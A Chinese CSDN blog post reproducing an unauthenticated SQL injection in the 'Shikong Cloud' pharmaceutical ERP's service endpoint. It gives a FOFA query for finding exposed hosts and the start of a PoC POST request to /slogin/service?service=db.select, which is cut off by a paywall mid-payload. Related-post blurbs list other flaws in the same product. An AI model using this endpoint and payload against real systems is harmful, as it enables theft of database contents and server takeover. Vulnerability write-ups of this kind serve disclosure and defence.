云时空社会化商业 ERP 系统 service SQL 注入漏洞复现

已于 2023-11-30 00:13:57 修改
阅读量910 收藏 8
点赞数 11
分类专栏: 漏洞复现 文章标签: 数据库 web安全 安全
于 2023-11-30 00:12:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134702067
版权

0x01 产品简介

 时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。

0x02 漏洞概述

  时空云社会化商业ERP service接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息),甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:app="云时空社会化商业ERP系统"

0x04 漏洞复现 

PoC

POST /slogin/service?service=db.select HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 75

params=%7B%22sql%22%3A%22sele
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞时空社会化商业ERP public.js 反序列化漏洞
qq_67810151的博客
03-22 478
时空社会化商业ERP系统存在反序列化漏洞,未授权的攻击者可以通过该漏洞远程执行代码,控制服务器。
时空社会化商业 ERP 系统 Shiro 反序列化漏洞
0xSec
11-29 867
时空社会化商业 ERP 系统存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。
时空社会化商业 ERP 系统 validateLoginName SQL 注入漏洞
0xSec
04-19 349
时空社会化商业ERP validateLoginName接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息),甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞时空社会化商业ERP系统命令执行漏洞
晚风不及你
04-24 31
时空社会化商业ERP系统存在Shiro命令执行漏洞,攻击者可以通过此漏洞获取服务器权限。
时空社会化商业ERP系统任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-20 401
时空商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以整合线上和线下交易模式,覆盖企业经营管理应用各个方面。有效掌控全流程情况,敏捷捕捉消费者需求,快速响应市场变化,规避经营风险,以市场为导向,优化部署营销资源,协同产销、供应与服务,帮助您的企业构建敏捷的经营管理平台,还能通过互联网、人工智能等创新模式,整合流通企业上下游产业链资源,协助您共享数字服务,提升企业数字化管控效率。
漏洞时空社会化商业ERP系统 validateLoginName SQL注入漏洞
qq_67810151的博客
04-19 329
时空社会化商业ERP validateLoginName接口存在SQL注入漏洞。未授权的攻击者可以通过该漏洞执行恶意sql语句,从而控制数据库。
漏洞时空社会化商业ERP系统LoginName SQL注入漏洞
晚风不及你
04-24 78
时空社会化商业ERP系统loginName存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库敏感信息。
漏洞时空社会化商业ERP系统slogin SQL注入漏洞
晚风不及你
04-24 62
时空社会化商业ERP系统slogin存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库敏感信息。
ERP系统进销存标准版
06-20
ERP系统进销存标准版
ERP进销存多仓库管理系统源码 带扫描多仓库进销存
07-14
ERP进销存多仓库管理系统源码下载 带扫描多仓库进销存 ERP进销存多仓库管理系统源码 带扫描多仓库进销存 ERP仓库管理系统源码 程序在原单仓的版本上进行了功能优化,扫描枪和库存预警等 许多功能使用会更加便捷...
ERP系统开发框架(Webform+Sqlserver)
07-08
案例介绍:曾经用来开发过企业官网,B2C电子商城,企业OA管理、CRM客户关系管理系统ERP外贸生产系统等,支持流程自定义,页面自定义,数据表操作等,用户只需简单的创建自己想要的模型就可以随心所欲的释放系统的...
分布式、服务化的ERP系统架构设计
02-25
本文来自于cnblogs,首先觉得我们做ERP系统前,就得有当今互联网思维。我们不要再去做一个大一统的系统了。曾几何时,我混迹于电商、珠宝行业4年多,为这两个行业开发过两套大型业务系统ERP)。作为一个ERP系统,...
如何mysql数据导入到mongdb
codemami的博客
05-30 770
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1085
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实平台并进行代码编写实功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
oracle中的INTERVAL函数学习总结
weixin_42821740的博客
05-30 379
简单学懂interval函数
行列视(RCV)能否在指定时间生成报表数据?
最新发布
2401_83701843的博客
05-30 121
需要注意的是,要实指定时间生成报表数据的功能,用户需要确保行列视(RCV)系统已经正确配置并连接了相应的数据源,同时还需要根据实际需求进行报表格式和计算逻辑的设置。此外,系统的稳定性和性能也是影响报表生成的重要因素,用户需要确保系统能够正常运行并处理大量的数据。其次,关于指定时间生成报表数据的需求,用户可以通过行列视(RCV)的定时任务功能来实。综上所述,行列视(RCV)具备在指定时间生成报表数据的能力,但具体实方式需要根据系统的配置和使用需求来确定。
SpringBoot 的 Java 代码配置(二)
xiaotu的博客
05-29 1100
因此,如果使用 HikariCP 只用声明你要用它就行,而声明要使用 Druid,你需要自己指定所使用的版本。上面的 DruidDataSource ,我们为其属性赋值时,它的四个属性都是简单类型属性,因此十分容易处理。但是,在 Spring 的容器中,Java Bean 可能会存在引用。在上面的 Druid 的配置中,数据库连接的四大属性值是在代码中『写死』的。而在 Java 代码配置中,通过 @Bean 方法的入参来表达 Bean 之间的引用关系。,所以,我们可以直接将自定义的配置项写在。
erp系统如何做自动化测试
05-17
ERP系统的自动化测试可以通过以下几个步骤实: 1. 确定测试范围:确定需要进行自动化测试的模块和功能。 2. 选择自动化测试工具:根据测试需求选择适合的自动化测试工具,比如Selenium、Appium等。 3. 编写测试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值